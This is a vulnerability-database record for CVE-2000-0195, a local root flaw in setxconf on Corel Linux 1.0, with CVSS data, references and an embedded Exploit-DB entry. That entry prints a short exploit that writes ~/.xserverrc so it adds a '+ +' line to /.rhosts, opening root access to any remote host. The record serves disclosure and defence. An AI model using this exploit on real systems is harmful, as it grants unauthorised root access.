{"id": "CVE-2000-0195", "bulletinFamily": "NVD", "title": "CVE-2000-0195", "description": "setxconf in Corel Linux allows local users to gain root access via the -T parameter, which executes the user's .xserverrc file.", "published": "2000-02-24T05:00:00", "modified": "2008-09-10T19:03:00", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0195", "reporter": "cve@mitre.org", "references": ["http://archives.neohapsis.com/archives/bugtraq/2000-02/0323.html", "http://www.securityfocus.com/bid/1008"], "cvelist": ["CVE-2000-0195"], "type": "cve", "lastseen": "2021-02-02T05:19:02", "edition": 4, "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "osvdb", "idList": ["OSVDB:1231"]}, {"type": "exploitdb", "idList": ["EDB-ID:19765"]}], "modified": "2021-02-02T05:19:02", "rev": 2}, "score": {"value": 6.7, "vector": "NONE", "modified": "2021-02-02T05:19:02", "rev": 2}, "vulnersScore": 6.7}, "cpe": ["cpe:/o:corel:linux:1.0"], "affectedSoftware": [{"cpeName": "corel:linux", "name": "corel linux", "operator": "eq", "version": "1.0"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.2, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 10.0, "obtainAllPrivilege": true, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:o:corel:linux:1.0:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-Other"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:o:corel:linux:1.0:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "20000224 Corel Linux 1.0 local root compromise", "refsource": "BUGTRAQ", "tags": [], "url": "http://archives.neohapsis.com/archives/bugtraq/2000-02/0323.html"}, {"name": "1008", "refsource": "BID", "tags": [], "url": "http://www.securityfocus.com/bid/1008"}]}

{"osvdb": [{"lastseen": "2017-04-28T13:19:56", "bulletinFamily": "software", "cvelist": ["CVE-2000-0195"], "edition": 1, "description": "# No description provided by the source\n\n## References:\n[CVE-2000-0195](https://vulners.com/cve/CVE-2000-0195)\nBugtraq ID: 1008\n", "modified": "2000-02-24T00:00:00", "published": "2000-02-24T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:1231", "id": "OSVDB:1231", "title": "Linux setxconf -T Option Local Privilege Escalation", "type": "osvdb", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T12:39:34", "description": "Corel Linux OS 1.0 setxconf Vulnerability. CVE-2000-0195. Local exploit for linux platform", "published": "2000-02-24T00:00:00", "type": "exploitdb", "title": "Corel Linux OS 1.0 setxconf Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2000-0195"], "modified": "2000-02-24T00:00:00", "id": "EDB-ID:19765", "href": "https://www.exploit-db.com/exploits/19765/", "sourceData": "source: http://www.securityfocus.com/bid/1008/info\r\n\r\nA vulnerability exists in the setxconf utility, as shipped with Corel Linux 1.0. The -T option to setxconf will run xinit, which euid root. xinit, when executed, will invoke the contents on ~/.xserverrc. A malicious user could therefore execute commands as root.\r\n\r\ncat > ~/.xserverrc\r\necho \"+ +\" > /.rhosts", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/19765/"}]}